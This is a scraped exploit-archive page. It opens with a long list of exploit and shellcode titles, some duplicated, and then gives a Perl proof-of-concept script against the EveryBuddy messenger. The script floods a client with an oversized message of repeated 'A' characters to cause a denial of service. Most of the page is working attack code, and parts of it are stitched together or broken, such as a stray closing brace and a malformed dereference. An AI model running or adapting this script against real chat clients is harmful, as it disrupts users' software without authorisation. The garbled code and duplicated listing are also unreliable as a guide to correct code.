
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
72 lines
No EOL
1.9 KiB
Perl
Executable file
72 lines
No EOL
1.9 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/8343/info
|
|
|
|
EveryBuddy is prone to a denial of service vulnerability when handling instant messages of excessive length. This could be exploited with a malicious instant messaging client.
|
|
|
|
This condition may be due to a buffer overflow, though this has not been confirmed.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
use MSN; # from <http://www.adamswann.com/library/2002/msn-perl/>
|
|
http://www.adamswann.com/library/2002/msn-perl/
|
|
|
|
my $client = MSN->new();
|
|
$client->connect('email address', 'password', '', {
|
|
Status => \&Status,
|
|
Answer => \&Answer,
|
|
Message => \&Message,
|
|
Join => \&Join }
|
|
);
|
|
|
|
|
|
sub Status {
|
|
my ($self, $username, $newstatus) = @_;
|
|
|
|
print "Status() called with parameters:\n";
|
|
print " " . join(",", @_), "\n";
|
|
|
|
# Print the status change info.
|
|
print "${username}'s status changed from " .
|
|
$self->buddystatus($username) . " to $newstatus.\n";
|
|
|
|
# Initiate the call.
|
|
$self->call($username);
|
|
|
|
# The call may take a few seconds to complete, so we can't
|
|
# immediately send messages. Let's put the message in a
|
|
# FIFO (queue) that is keyed by username.
|
|
push (@{$queue{$username}}, "Glad to see you online!");
|
|
}
|
|
|
|
}
|
|
|
|
sub Message {
|
|
my ($self, $username, undef, $msg) = @_;
|
|
|
|
print "Message() called with parameters:\n";
|
|
print " " . join(",", @_), "\n";
|
|
|
|
}
|
|
|
|
sub Join {
|
|
my ($self, $username) = @_;
|
|
|
|
print "Join() called with parameters:\n";
|
|
print " " . join(",", @_), "\n";
|
|
|
|
# See if there's anything queued up.
|
|
# Deliver each message if there is stuff in the queue for this user.
|
|
while ($_ = shift @{$queue{$username}}) {
|
|
$$self->sendmsg($_);
|
|
}
|
|
}
|
|
|
|
sub Answer {
|
|
my ($self, $username) = @_;
|
|
|
|
print "Answer() called with parameters:\n";
|
|
print " " . join(",", @_), "\n";
|
|
|
|
# Send a hello message.
|
|
$$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r"x55);
|
|
|
|
} |